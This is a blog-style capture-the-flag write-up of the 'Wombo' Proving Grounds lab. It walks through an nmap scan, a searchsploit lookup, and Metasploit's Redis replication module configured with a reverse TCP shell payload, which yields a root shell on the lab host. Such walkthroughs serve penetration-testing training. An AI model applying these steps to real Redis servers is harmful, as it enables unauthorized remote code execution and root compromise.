Avatar Avatar

Home

Menu: Blog
  • Blog
  • Tags
  • Search

    • Wombo - OSPG

     Tags:  | red | linux | ctf |
    Read this in "about 3 minutes".

    Summary

    In this writeup, we’ll exploit the vulnerable Redis service to compromise root access on the target system.

    Enumeration

    Nmap

    We’ll begin with a nmap scan.

    $ sudo nmap --open -sV -A -p- -vv -n -Pn $IP
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGBXRhQCez7/IOdnHzLYdpVtWWRMN/7bUR/C3T/W6V9DwlKUS2AfdncLdLwqnx61jODFdXDrTdEdTAtK4MHuXt/UOLDXr1SOfUHYQbZd1rmpMaeB3qOKfoVP7NMp2Ga68kT/9NvBphakYXRWw4C7RS0N+4YWU/BjSyMTIdnhJX05lC5Uyljg7FliJ7d3J/CtF98I6Oo5u/Eb2/5BB45/1IuM6R7BGCDOpIs6po1FyEk8gFktbB+INGATdBPxvmAOX6G7m/R491a9/QtaF8wrgsjS3fQftoiW8vwcaom8Bmu94xZ9pZq0Dgt9VWQz241T5dGQrp57s6Djl/V83/qGFP
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg0oQ1t4NCz+KWPtrCjgDf+qjW2Vb4oOc/eM21vT9rIPJa//rO0LFT8czDxcWFU9HMSEohfSm8emC4lShgGrY4=
|   256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPS81xs7EU6k92rNFdmsDF7qcRDxDILJUeva18aKW1GV
80/tcp    open  http       syn-ack ttl 63 nginx 1.10.3
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp  open  redis      syn-ack ttl 63 Redis key-value store 5.0.9
8080/tcp  open  http-proxy syn-ack ttl 63
27017/tcp open  mongod?    syn-ack ttl 63
    • There are a few open services. Thoroughly enumerating all services, we are particularly interested in the redis.

    Exploitation

    Redis RCE

    Conducting a few investigations, we discover that the Redis v5.0.9 is vulnerable to Unauthenticated Remote Code Execution.

    $ searchsploit redis
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)                                                                                                                    | linux/remote/47195.rb
...
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

    Within the Metasploit console, we adjust configurations as the following.

    msf6 exploit(linux/redis/redis_replication_cmd_exec) > options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    192.168.106.69   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   192.168.49.106   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   6379             yes       The local port to listen on.


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.49.106   yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

    then enter exploit.

    msf6 exploit(linux/redis/redis_replication_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.49.106:8080 
[*] 192.168.106.69:6379   - Compile redis module extension file
[+] 192.168.106.69:6379   - Payload generated successfully! 
[*] 192.168.106.69:6379   - Listening on 192.168.49.106:6379
[*] 192.168.106.69:6379   - Rogue server close...
[*] 192.168.106.69:6379   - Sending command to trigger payload.
[*] Sending stage (38 bytes) to 192.168.106.69
[*] Command shell session 1 opened (192.168.49.106:8080 -> 192.168.106.69:35962) at 2021-09-05 11:43:12 +1000
[!] 192.168.106.69:6379   - This exploit may require manual cleanup of './ahltczis.so' on the target

root@wombo:/# id
uid=0(root) gid=0(root) groups=0(root)

    Further privilege escalation phase is trivial since we’re already root on the system!.

    Infomation Security © 2021-2024 • All right reserved.
    Simplicity is fashionable.
    Made with Jekyll using Typing Theme.